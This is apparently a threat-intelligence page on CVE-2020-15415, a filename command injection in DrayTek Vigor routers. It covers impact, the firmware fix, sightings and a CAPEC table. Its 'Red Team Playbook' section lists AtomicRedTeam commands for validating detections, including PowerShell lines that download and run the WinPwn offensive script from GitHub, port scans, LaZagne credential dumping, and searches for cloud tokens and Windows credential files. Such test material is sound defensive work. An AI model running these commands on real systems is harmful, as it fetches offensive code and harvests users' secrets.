CVE-2020-15415
Overview
This vulnerability is a command injection flaw arising from improper input validation of filenames in the cvmcfgupload functionality on DrayTek Vigor devices. The affected component is the /cgi-bin/mainfunction.cgi/cvmcfgupload endpoint, which processes file uploads with the content type text/x-python-script. The root cause is the failure to sanitize shell metacharacters in the filename parameter, enabling injection of arbitrary shell commands.
Vulnerability Description
On DrayTek Vigor3900, Vigor2960, and Vigor300B devices before 1.5.1, cgi-bin/mainfunction.cgi/cvmcfgupload allows remote command execution via shell metacharacters in a filename when the text/x-python-script content type is used, a different issue than CVE-2020-14472.
Impact
An unauthenticated attacker can execute arbitrary system commands on affected DrayTek Vigor devices, resulting in full device compromise. This enables control over network traffic, potential lateral movement within the network, and disruption or manipulation of device operations. No user interaction or credentials are required to exploit this vulnerability, increasing its severity in exposed environments.
Solution
Users should upgrade affected DrayTek Vigor3900, Vigor2960, and Vigor300B devices to firmware version 1.5.1 or later as detailed in the vendor's security advisory available at https://www.draytek.com/about/security-advisory. The advisory provides specific patch instructions and mitigation steps. Applying the official firmware update is the recommended remediation to eliminate this command injection vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in specific DrayTek Vigor devices arises from improper handling of input in the cgi-bin/mainfunction.cgi/cvmcfgupload endpoint. This flaw allows an attacker to execute arbitrary commands on the affected devices by manipulating the filename parameter using shell metacharacters. The issue is particularly critical due to its exploitation potential when the content type is set to text/x-python-script. This misconfiguration creates a pathway for attackers to bypass security mechanisms and gain unauthorized access to the underlying operating system, leading to severe consequences.
Attack vectors for this vulnerability are primarily remote, enabling exploitation without physical access to the device. An attacker could craft a malicious request that includes specially formatted filenames containing shell metacharacters. By sending this request to the vulnerable endpoint, the attacker can execute arbitrary commands, which could range from simple information gathering to full system compromise. Scenarios may include deploying malware, altering configurations, or even using the compromised device as a launchpad for further attacks on the network. The simplicity of the exploit, combined with the high impact, makes this vulnerability particularly dangerous.
The real-world impact of this vulnerability can be significant, especially for organizations relying on the affected DrayTek models for their networking needs. A successful exploitation could lead to unauthorized access to sensitive data, disruption of services, and potential data breaches. The business risks associated with such incidents include financial losses, reputational damage, and regulatory penalties, particularly if sensitive customer information is exposed. Furthermore, the compromised devices could be leveraged to conduct attacks on other systems, amplifying the risk and potential fallout for the organization.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating firmware to the latest versions is crucial, as vendors often release patches to address known vulnerabilities. Additionally, organizations should employ network monitoring tools to detect unusual traffic patterns that may indicate exploitation attempts. Implementing strict access controls and network segmentation can also limit the potential damage from a successful attack. Furthermore, conducting regular security assessments and penetration testing can help identify and remediate vulnerabilities before they can be exploited by malicious actors.
In conclusion, the vulnerability affecting specific DrayTek Vigor devices poses a significant threat due to its potential for remote command execution. The ease of exploitation and the severe implications for affected organizations underscore the importance of proactive security measures. By prioritizing firmware updates, monitoring network activity, and conducting regular security assessments, organizations can better protect themselves from the risks associated with this vulnerability and enhance their overall cybersecurity posture.
CSURFACE threat intelligence has identified a slight increase in detection activity related to CVE-2020-15415 targeting DrayTek Vigor devices. While the overall exploit landscape remains stable with no new proof-of-concept exploits or ransomware affiliations emerging, this modest uptick signals persistent adversary interest in leveraging this critical remote command execution vulnerability. The continued presence of exploit attempts, albeit at a low and steady level, underscores the necessity for defenders to maintain vigilance in monitoring network traffic and device behavior. Although the risk posture has not escalated dramatically, the vulnerability’s high severity combined with ongoing exploitation attempts sustains its relevance as a significant threat vector within enterprise environments.
Update 2 — July 03, 2026
CSURFACE threat intelligence has identified a modest but discernible increase in exploitation attempts targeting the CVE-2020-15415 vulnerability on DrayTek Vigor devices. While the overall volume remains relatively low, this upward trend signals sustained adversary interest in leveraging this critical remote command execution flaw. Notably, no new proof-of-concept exploits or ransomware affiliations have surfaced, indicating that threat actors continue to rely on established techniques rather than novel methods. This persistence underscores the vulnerability’s enduring attractiveness as an attack vector, particularly given its high severity rating. For defenders, the incremental rise in activity reinforces the importance of ongoing monitoring and detection efforts, as even limited exploitation can lead to significant operational impact if successful. The risk posture remains elevated but stable, reflecting a consistent threat environment without sudden escalation.
Affected Products (3)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Draytek | Vigor3900 Firmware | All |
cpe:2.3:o:draytek:vigor3900_firmware:*:*:*:*:*:*:*:*
|
|
|
Draytek | Vigor2960 Firmware | All |
cpe:2.3:o:draytek:vigor2960_firmware:*:*:*:*:*:*:*:*
|
|
|
Draytek | Vigor300b Firmware | All |
cpe:2.3:o:draytek:vigor300b_firmware:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
28 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
44%
|
High | High | |
| CAPEC-6 | Argument Injection |
43%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
40%
|
Medium | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-15415 |
| draytek.com |
GitHub CVE
x_refsource_MISC
|
https://www.draytek.com/about/security-advisory |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/CLP-team/Vigor-Commond-Injection |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-15415 |